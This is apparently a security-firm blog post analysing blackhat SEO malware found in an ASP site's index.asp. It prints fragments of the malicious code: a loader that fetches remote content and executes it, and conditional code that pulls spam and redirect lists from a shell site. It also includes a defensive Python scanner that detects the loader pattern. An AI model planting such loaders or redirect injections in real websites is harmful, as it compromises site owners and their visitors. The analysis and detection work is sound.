Blackhat SEO and ASP Sites

It’s all too easy to scream and holler at PHP-based websites and the various malware variants associated with the technology, but perhaps we’re a bit too biased.

Here is a quick post on an ASP variant. Thought we’d give you Microsoft types some love too.

Today we found this nice BlackHat SEO attack:

[Image: Sucuri SiteCheck ASP Malware]

Finding it was easy. The bad code was sitting at the beginning of index.asp begging for some attention:

execute body
Public Function GetHtml(url)    
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")    
ObjXMLHTTP.Open "GET",url,False    
ObjXMLHTTP.setRequestHeader "User-Agent",url    
Set ObjXMLHTTP=Nothing    
set objStream = Server.CreateObject("Adodb.Stream")    
objStream.Type = 1    
objStream.Mode =3    
objStream.Write GetHtml    
objStream.Position = 0    
objStream.Type = 2    
objStream.Charset = "UTF-8"    
GetHtml = objStream.ReadText    
End Function

The code is really straightforward: it creates a function called GetHtml that downloads the content from httx:// and executes it.
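
An added example, not from the original post or from Sucuri's tooling: a heuristic scanner for the loader pattern described above, where a variable is passed to Execute in a file that also creates a server-side HTTP client. The function names, verdict labels and the `head_lines` threshold are assumptions of this example, and both samples are constructed.

```python
import re

# Server-side HTTP client ProgIDs available to classic ASP (MSXML2, WinHTTP).
HTTP_CLIENT = re.compile(
    r'CreateObject\s*\(\s*"(?:MSXML2|Microsoft|WinHttp)\.\w*HTTP[\w.]*"', re.I)
ADODB_STREAM = re.compile(r'CreateObject\s*\(\s*"ADODB\.Stream"', re.I)
# Execute / ExecuteGlobal / Eval applied to a variable. The lookbehind skips
# method calls such as conn.Execute(sql), which are normal in ASP database code.
DYNAMIC_EXEC = re.compile(
    r'(?<![.\w])(?:execute(?:global)?|eval)\b[ \t]*\(?[ \t]*[a-z_]\w*', re.I)
STRING_LITERAL = re.compile(r'"[^"\n]*"')

def strip_comment(line):
    """Drop a VBScript ' comment, ignoring apostrophes inside string literals."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line

def scan_asp(source, head_lines=25):
    """Return a verdict plus the line numbers of dynamic Execute/Eval calls."""
    code = "\n".join(strip_comment(l) for l in source.splitlines())
    bare = STRING_LITERAL.sub('""', code)  # blank literals so text is not matched
    exec_lines = [bare.count("\n", 0, m.start()) + 1
                  for m in DYNAMIC_EXEC.finditer(bare)]
    fetches = bool(HTTP_CLIENT.search(code))
    verdict = ("remote-code-loader" if exec_lines and fetches
               else "dynamic-exec-only" if exec_lines else "clean")
    return {"verdict": verdict, "exec_lines": exec_lines,
            "near_top": any(n <= head_lines for n in exec_lines),
            "http_client": fetches,
            "adodb_stream": bool(ADODB_STREAM.search(code))}

# Constructed samples: INFECTED reuses lines from the snippet above.
INFECTED = """<%
execute body
Public Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
set objStream = Server.CreateObject("Adodb.Stream")
End Function
%>"""
CLEAN = """<%
' execute body   (commented out)
Set rs = conn.Execute(sql)
Response.Write "execute order"
%>"""
```

A "dynamic-exec-only" verdict still deserves a manual look, since the fetch can live in an included file.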

Curious what the code is? Not to worry, it’s nothing more than an ASP variant of some good old conditional malware (image is a snippet).

[Image: Sucuri ASP Malware]

What I do find very interesting about this code is the following snippet:

Refer= Request.ServerVariables("HTTP_REFERER") '// 父级来源地址 (parent referrer address)
user_agent=Request.ServerVariables("HTTP_USER_AGENT") '//服务器信息 (server information)

http_host = host
info = Request.ServerVariables("PATH_INFO")

If InStr(http_host,"www") > 0 Then 
end if

base = ""
indexurl = base&"/"&shellsite&"/index.php"

object_str = base&"/"&shellsite&"/object.txt"
if CheckURL(object_str) then
	ret_object = Trim(getHTTPPage(object_str))
end if

Each infected site has its own version of the spam content; only “valid” infected sites will download this spam code. You’ll find that the iframe injection is also there:

jump_str = base&"/"&shellsite&"/jump.txt"
'response.Write jump_str

newcode = 0 '是否是新跳转代码 (whether this is new redirect code)

if Len(ret_object)>3 and CheckURL(object_str) then
	open_urls = base&"/"&ret_object&"/url.txt" '跳转站列表 (list of redirect sites)
	'response.Write open_urls
	open_urls = getHTTPPage(open_urls)
	DomainTypeArray = split(open_urls,"|")
	Pathcoun = Ubound(DomainTypeArray)
	RndNumber = INT((Pathcoun+1)*RND)
	'response.Write DomainTypeArray(RndNumber)
	if instr(DomainTypeArray(RndNumber),"www")>0 then
		open_url = ""
		open_url = ""
	end if
	newcode = 1
	open_url = base&"/"&shellsite&"/url.txt" '唯一跳转代码 (unique redirect code)
end if

It’s a good way to dynamically control what gets injected into the site’s code.

In short, all this to say, ASP is no better than PHP; there is an equal number of variants on both technologies. We just write more about PHP as it’s one of the most prevalent technologies being consumed by everyday website owners and their lovely Content Management Systems (CMS).

Oh, and did anyone else notice, what appears to be, Chinese :) … ummmm….. ;P

